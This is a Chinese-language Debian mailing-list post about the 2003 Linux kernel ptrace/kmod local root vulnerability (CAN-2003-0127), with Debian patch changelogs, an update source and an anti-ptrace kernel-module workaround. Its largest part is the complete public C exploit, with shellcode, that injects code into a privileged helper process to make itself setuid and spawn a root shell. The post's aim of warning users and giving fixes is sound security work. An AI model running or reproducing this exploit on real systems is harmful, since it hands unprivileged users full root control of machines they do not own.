
Ptrace Vulnerability Allows Gaining of Elevated Privileges under Linux



Ok, 许多朋友透过 ICQ/Mail 跟我讨论关于 Ptrace Vulnerability Allows Gaining
of Elevated Privileges under Linux,也就是 CAN-2003-0127
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0127>。由 Andrzej
Szombierski 在 西元2003年03月20日 03:22 首次公开在 BugTraq Mailing List 发布
相关的资讯细节 <http://www.securityfocus.com/archive/1/315635>。许多朋友埋怨
Debian 在这次的事情上居然没有发布 DSA 来说明这件安全危机。

这次的系统安全问题是在于核心中的 ptrace (process trace) system call 的缺陷,
以致于 local user 可以轻易的取得 root 权限。例如透过使用以下的 exploit 可以
取得 root 权限。

*这是 public exploit, 仅供测试, 不得在非个人机器使用*

Sample exploit here (ix86-only):
http://august.v-lo.krakow.pl/~anszom/km3.c
or
http://isec.pl/cliph/isec-ptrace-kmod-exploit.c

Exploit:
----------------------------------------------------------------------
/*
 * Linux kernel ptrace/kmod local root exploit
 *
 *
 *
 * Should work under all current 2.2.x and 2.4.x kernels.
 *
 * I discovered this stupid bug independently on January 25, 2003, that
 * is (almost) two month before it was fixed and published by Red Hat
 * and others.
 *
 * Wojciech Purczynski <cliph@isec.pl>
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
 * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
 *
 * (c) 2003 Copyright by iSEC Security Research
 */

#include <grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
#include <linux/user.h>

/*
 * Raw machine code that putcode() writes into the victim process; the
 * page describes the exploit as ix86-only.  The bytes are not decoded
 * here.
 */
char cliphcode[] =
 "\x90\x90\xeb\x1f\xb8\xb6\x00\x00"
 "\x00\x5b\x31\xc9\x89\xca\xcd\x80"
 "\xb8\x0f\x00\x00\x00\xb9\xed\x0d"
 "\x00\x00\xcd\x80\x89\xd0\x89\xd3"
 "\x40\xcd\x80\xe8\xdc\xff\xff\xff";

/* Length of cliphcode without the string literal's trailing NUL. */
#define CODE_SIZE (sizeof(cliphcode) - 1)

/*
 * PIDs of the three processes involved; fatal() sends SIGKILL to all of
 * them.  They are 1 until main()/do_child() assign them, so a fatal()
 * before that point would direct kill() at pid 1.
 */
pid_t parent = 1;
pid_t child = 1;
pid_t victim = 1;
/* Incremented by the SIGCHLD handler; do_child() busy-waits on it. */
volatile int gotchild = 0;

/*
 * Report msg through perror() and then SIGKILL parent, child and victim
 * in that order.  There is no explicit exit: one of the targets is the
 * calling process itself once main()/do_child() have set the globals.
 */
void fatal(char * msg)
{
 pid_t doomed[] = { parent, child, victim };
 size_t i;

 perror(msg);
 for (i = 0; i < sizeof doomed / sizeof doomed[0]; i++)
  kill(doomed[i], SIGKILL);
}

/*
 * Copy cliphcode followed by the path of this executable (read from
 * /proc/self/exe) into the victim's text at dst, one unsigned long per
 * PTRACE_POKETEXT.  Every failure is routed through fatal().
 */
void putcode(unsigned long * dst)
{
 char buf[MAXPATHLEN + CODE_SIZE];
 unsigned long * src;
 int i, len;

 memcpy(buf, cliphcode, CODE_SIZE);
 /* readlink() returns the path length and does not NUL-terminate. */
 len = readlink("/proc/self/exe", buf + CODE_SIZE, MAXPATHLEN - 1);
 if (len == -1)
  fatal("[-] Unable to read /proc/self/exe");

 len += CODE_SIZE + 1;
 buf[len] = '\0';

 /* Word-sized pokes: the last iteration may copy up to 3 bytes past len. */
 src = (unsigned long*) buf;
 for (i = 0; i < len; i += 4)
  if (ptrace(PTRACE_POKETEXT, victim, dst++, *src++) == -1)
   fatal("[-] Unable to write shellcode");
}

/*
 * SIGCHLD handler installed by do_child().  The first SIGCHLD (presumably
 * the stop caused by PTRACE_ATTACH) only bumps gotchild; on the second
 * one the handler reads the victim's registers, writes the code at the
 * victim's current eip via putcode(), detaches and exits the child.
 * fprintf(), ptrace() and exit() are all called from signal context.
 */
void sigchld(int signo)
{
 struct user_regs_struct regs;

 if (gotchild++ == 0)
  return;

 fprintf(stderr, "[+] Signal caught\n");

 if (ptrace(PTRACE_GETREGS, victim, NULL, &regs) == -1)
  fatal("[-] Unable to read registers");

 fprintf(stderr, "[+] Shellcode placed at 0x%08lx\n", regs.eip);

 putcode((unsigned long *)regs.eip);

 fprintf(stderr, "[+] Now wait for suid shell...\n");

 if (ptrace(PTRACE_DETACH, victim, 0, 0) == -1)
  fatal("[-] Unable to detach from victim");

 exit(0);
}

/*
 * SIGALRM handler for the 10 s watchdog armed in main(): set errno to
 * ECANCELED so perror() has something to print, then abort via fatal().
 */
void sigalrm(int signo)
{
 errno = ECANCELED;
 fatal("[-] Fatal error");
}

/*
 * Child side.  The victim PID is guessed as this PID + 1 (assumes
 * sequential PID allocation with no other fork in between).  The child
 * installs sigchld(), retries PTRACE_ATTACH until the PID exists, waits
 * for the first SIGCHLD, requests a syscall stop and then spins forever;
 * sigchld() ends the process with exit(0).
 * Defender note: an unprivileged process hammering PTRACE_ATTACH on a
 * not-yet-existing PID is the observable part of this race.
 */
void do_child(void)
{
 int err;

 child = getpid();
 victim = child + 1;

 signal(SIGCHLD, sigchld);

 /* Loop while the guessed PID does not exist yet (ESRCH). */
 do
  err = ptrace(PTRACE_ATTACH, victim, 0, 0);
 while (err == -1 && errno == ESRCH);

 if (err == -1)
  fatal("[-] Unable to attach");

 fprintf(stderr, "[+] Attached to %d\n", victim);
 /* gotchild is volatile; set to 1 by sigchld() on the first SIGCHLD. */
 while (!gotchild) ;
 if (ptrace(PTRACE_SYSCALL, victim, 0, 0) == -1)
  fatal("[-] Unable to setup syscall trace");
 fprintf(stderr, "[+] Waiting for signal\n");

 for(;;);
}

/*
 * Parent side.  socket(AF_SECURITY, ...) is the trigger — NOTE(review):
 * per the exploit's own description this makes the kernel spawn a
 * privileged module-loading helper, which is the process the child
 * attaches to; that is not visible in this code.  The parent then polls
 * stat(progname) until its own executable has become setuid, cancels the
 * SIGALRM watchdog and re-runs itself via system(), where prepare()
 * takes over.  The socket() return value is deliberately ignored.
 */
void do_parent(char * progname)
{
 struct stat st;
 int err;
 errno = 0;
 socket(AF_SECURITY, SOCK_STREAM, 1);
 /* Busy-poll until the setuid bit appears or stat() itself fails. */
 do {
  err = stat(progname, &st);
 } while (err == 0 && (st.st_mode & S_ISUID) != S_ISUID);

 if (err == -1)
  fatal("[-] Unable to stat myself");

 alarm(0);
 system(progname);
}

/*
 * Run first from main(): when the effective uid is already 0 (the binary
 * re-executed after do_parent() saw it become setuid), reset the group
 * list, set gid/uid to 0 and replace the process with _PATH_BSHELL.
 * Otherwise return and let main() continue.  As in the original, the
 * results of initgroups()/setgid()/setuid() are not checked.
 */
void prepare(void)
{
 if (geteuid() != 0)
  return;

 initgroups("root", 0);
 setgid(0);
 setuid(0);
 execl(_PATH_BSHELL, _PATH_BSHELL, NULL);
 fatal("[-] Unable to spawn shell");
}

/*
 * Entry point.  Order matters: prepare() first (a re-executed copy that
 * is already root never returns from it), then a 10 s SIGALRM watchdog
 * handled by sigalrm(), then the fork.  Both processes guess the victim
 * PID as child + 1; argv[0] is handed to do_parent() as the path to
 * re-run.  Note that the fork() result is checked only after victim has
 * been derived from it.
 */
int main(int argc, char ** argv)
{
 prepare();
 signal(SIGALRM, sigalrm);
 alarm(10);

 parent = getpid();
 child = fork();
 victim = child + 1;

 if (child == -1)
  fatal("[-] Unable to fork");

 if (child == 0)
  do_child();
 else
  do_parent(argv[0]);

 return 0;
}
----------------------------------------------------------------------

我弄不清楚为甚么 Debian Security Team 没有发布 DSA 来警告大家该更新系统,
或许是世界不太和平的关系。然而,事实上,Debian Security Team 的确发布了两个
相关的 DSA:

[DSA 270-1] New Linux kernel packages (mips + mipsel) fix local root exploit
http://www.debian.org/security/2003/dsa-270
[DSA 276-1] New Linux kernel packages (s390) fix local root exploit
http://www.debian.org/security/2003/dsa-276

Alan Cox 在 Mar 13 改好一份 Linux 2.4.20/Linux 2.4.21pre patch
<http://www.uwsg.iu.edu/hypermail/linux/kernel/0303.2/0226.html>。至于在 Debian
woody 上的更新程式其实从 Mar 18 开始使用 Alan 的 patch 从 x86 版本起都已经逐
渐上传到 woody-proposed-updates,所以有解决方案,只是没有 DSA 而已。

----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00021.html
Date: Tue, 18 Mar 2003 20:39:44 +1100
Changes:
 kernel-source-2.4.20 (2.4.20-3woody.2) stable; urgency=low
 .
   * Fixed ptrace security hole.
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00022.html
Date: Wed, 19 Mar 2003 20:41:31 +1100
Changes:
 kernel-source-2.4.20 (2.4.20-3woody.3) stable; urgency=low
 .
   * Made ptrace fix compile on alpha.
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00028.html
Date: Tue, 18 Mar 2003 20:49:07 +1100
Changes:
 kernel-source-2.2.25 (2.2.25-1) stable unstable; urgency=low
 .
   * New upstream release.
    . Fixes the ptrace security hole.
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00029.html
Date: Tue, 18 Mar 2003 20:56:26 +1100
Changes:
 kernel-image-2.2.25-i386 (2.2.25-1) stable unstable; urgency=low
 .
   * New upstream release.
    . Fixes the ptrace security hole.
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00030.html
Date: Tue, 18 Mar 2003 21:30:17 +1100
Changes:
 kernel-image-2.4.20-1-i386 (2.4.20-3woody.2) stable; urgency=low
 .
   * Rebuilt against kernel-source 2.4.20-3woody.2.
    . Fixed ptrace security hole.
    . Changed modules ABI.
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00031.html
Date: Tue, 18 Mar 2003 20:58:33 +1100
Changes:
 kernel-image-2.2.25-alpha (2.2.25-1) stable unstable; urgency=low
 .
   * New upstream release.
    . Fixes the ptrace security hole.
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00032.html
Date: Thu, 20 Mar 2003 20:20:37 +1100
Changes:
 kernel-image-2.4.20-1-alpha (2.4.20-1woody.3) stable; urgency=low
 .
   * Rebuilt against kernel-source 2.4.20-3woody.3.
    . Fixed ptrace security hole.
    . Changed modules ABI.
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00033.html
Date: Thu, 20 Mar 2003 12:46:33 -0500
Changes:
 kernel-image-sparc-2.4 (26.potato.1) stable; urgency=low
 .
   * Compile against newer kernel source for ptrace fix.
   * Added UltraSPARC I HME ethernet patch.
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00035.html
Date: Tue, 25 Mar 2003 22:48:35 +0100
Changes:
 kernel-image-2.4.17-s390 (2.4.17-2.woody.2) stable; urgency=high
 .
   * Integrated new kernel-patches from the IBM Developerworks
     website which fix some severe problems (released on
     2002.11.25, 2003.02.20 and 2003.03.17).
   * Integrated a patch by Allan Cox to fix a ptrace related
     security problem (backport from kernel version 2.4.20)
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00037.html
Date: Sun, 23 Mar 2003 22:34:31 +0100
Changes:
 kernel-patch-2.4.17-mips (2.4.17-0.020226.2.woody1) stable-security;
urgency=high
 .
   * ptrace security fix
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00038.html
Date: Tue, 18 Mar 2003 14:22:09 +0100
Changes:
 kernel-patch-2.4.19-mips (2.4.19-0.020911.1.woody1) stable-security;
urgency=high
  .
     * fix ptrace security hole
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200304/msg00004.html
Date: Fri, 28 Mar 2003 17:05:23 +0100
Changes:
 kernel-image-2.4.17-s390 (2.4.17-2.woody.2.1) stable-security; urgency=high
 .
   * NMU
   * Use new kernel-patch with a different fix for the ptrace
     security problem, provided by Martin Schwidefsky.
   * drop all non-security fixes relative to 2.4.17-2.woody.1.1.
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200304/msg00003.html
Date: Thu, 03 Apr 2003 10:58:12 +0100
Changes:
 kernel-image-2.4.17-s390 (2.4.17-2.woody.2.2) stable-security; urgency=high
 .
   * NMU
   * revert accidental configuration changes
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200304/msg00002.html
Date: Fri, 28 Mar 2003 15:53:03 +0100
Changes:
 kernel-patch-2.4.17-s390 (0.0.20020816-0.woody.1.1) stable-security;
urgency=high
 .
   * NMU
   * Added an s390 specific patch for the ptrace vulnerability,
     provided by Martin Schwidefsky <schwidefsky@de.ibm.com>.
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200304/msg00007.html
Date: Tue, 14 Jan 2003 12:44:43 +0100
Changes:
 kernel-image-2.4.19-arm (2.4.19-1) stable; urgency=low
 .
   * Initial upload to build the various ARM kernel-images from
     one package, much like it is done for i386.
   * Makefile.diff works around too long argument lists
   * Makefile_scsi.diff adds scsi_error.o and scsi_ioctl.o to export-objs in
     drivers/scsi/Makefile
   * Makefile_scsi_ioctl.patch exports a needed symbol for the netwinder
     images to resolve some undefined references in the scsi modules
   * get_lost_old_nettrom.patch quick and dirty hack so that CATS can boot
   * ptrace.patch fixes the ptrace vulnerability
----------------------------------------------------------------------

各位可以透过这个 apt resource 来更新档案,建议马上更新你的系统
deb ftp://ftp.us.debian.org/debian dists/woody-proposed-updates/

如果你不想更新 kernel,一个 workaround 是装 NPT LKM (No Ptrace Linux Kernel
Module)。这个 LKM 将让除了 root 以外的用户无法使用 ptrace,因此非 root 的
user 将无法使用 gdb 等工具。

----------------------------------------------------------------------
#!/bin/sh
# MAKE ME EXECUTABLE !!!
#
# root@Hogwarts:/home/sacrine/TEST# chmod +x anti-ptrace
# root@Hogwarts:/home/sacrine/TEST# ./anti-ptrace
# [+] making anti-ptrace.c: OK
# [+] compiling the script: OK
# [+] loading the module : OK
#

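echo -n " [+] making anti-ptrace.c: "
# Quoted delimiter: the C source below is written out verbatim, with no
# parameter or command substitution applied by the shell (the body uses
# none today, so the output is unchanged; this keeps it that way).
cat > anti-ptrace.c <<'NETRIC'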

/*
 * Noodoplossing voor de ptrace race vuln
 * anti-ptrace.c by sacrine
 * netric.org
 */

#define __KERNEL__
#define MODULE
#define LINUX

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/types.h>
#include <linux/version.h>
#include <linux/slab.h>
#include <linux/sched.h>
#include <linux/fs.h>
#include <linux/ctype.h>
#include <linux/tty.h>
#include <sys/syscall.h>

#include <linux/ptrace.h>

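/*
 * Saved pointer to the kernel's own sys_ptrace().  Linux 2.4 declares it
 * as sys_ptrace(long request, long pid, long addr, long data); the hook
 * below must use the same four-argument layout, otherwise the arguments
 * it forwards are shifted by one position.
 */
int (*o_ptrace)(long request, long pid, long addr, long data);

extern void* sys_call_table[];

/*
 * Replacement for sys_ptrace(): forwards the call unchanged when the
 * caller's uid is 0 and refuses it for everybody else, logging the
 * caller's pid/uid via printk() and console_print().
 *
 * Returns the original handler's result for root, -EPERM otherwise.
 * System calls report failure as a negative errno; a positive EPERM
 * would reach user space as a non-error return value.
 * NOTE(review): the kernel declares its syscall handlers asmlinkage;
 * confirm the calling convention matches on the target kernel.
 */
int anti_ptrace(long request, long pid, long addr, long data)
{
   if (current->uid == 0)
      return o_ptrace(request, pid, addr, data);

   printk("warning: ptrace(); violation\n"
          "pid=[%i] uid=[%i]\n",
          current->pid, current->uid);

   /* The original split this literal across two lines, which does not compile. */
   console_print("warning: non-root users are not allowed to use ptrace();\n");
   return -EPERM;
}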

/*
 * Module entry: save the current sys_ptrace() table entry and replace it
 * with anti_ptrace().  The swap is a plain store with no locking and no
 * check that the slot still holds the stock handler, so a hook installed
 * by another module afterwards would be chained silently and later
 * restored wrongly by cleanup_module().  SYS_ptrace comes from
 * <sys/syscall.h>, a user-space header — presumably equal to the
 * kernel's __NR_ptrace here, but that is not verified.
 * Always returns 0.
 */
int init_module(void)
{
   o_ptrace=sys_call_table[SYS_ptrace];
   sys_call_table[SYS_ptrace]=anti_ptrace;

   printk("anti-ptrace kernel module loaded with pid=[%i]\n",
  current->pid);

   return(0);
}

/*
 * Module exit: put the saved sys_ptrace() pointer back unconditionally.
 * Nothing here waits for ptrace() calls that are still executing inside
 * anti_ptrace() before the module text goes away.
 */
void cleanup_module(void)
{
   sys_call_table[SYS_ptrace]=o_ptrace;
   printk("anti-ptrace kernel module ended with pid=[%i]\n",
  current->pid);
}

NETRIC
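echo "OK"
echo -n " [+] compiling the script: "
# Stop if the module does not build; the original printed OK regardless
# of gcc's exit status and went on to insmod anyway.
if ! gcc -c anti-ptrace.c -I"/lib/modules/$(uname -r)/build/include"; then
 echo "FAILED"
 exit 1
fi
echo "OK"
echo -n " [+] loading the module : "
# insmod's stdout is discarded as before; its stderr and exit status are kept.
if ! /sbin/insmod anti-ptrace.o >/dev/null; then
 echo "FAILED"
 exit 1
fi
echo "OK"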

# sacrine [Netric Security]
----------------------------------------------------------------------

另外一个 NPT LKM http://www.securiteam.com/tools/5SP082K5GK.html
-- 
-Rex, geek by nature linux by choice

-- 
To UNSUBSCRIBE, email to debian-chinese-big5-request@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org

-- 
| This message was re-posted from debian-chinese-big5@lists.debian.org
| and converted from big5 to gb2312 by an automatic gateway.


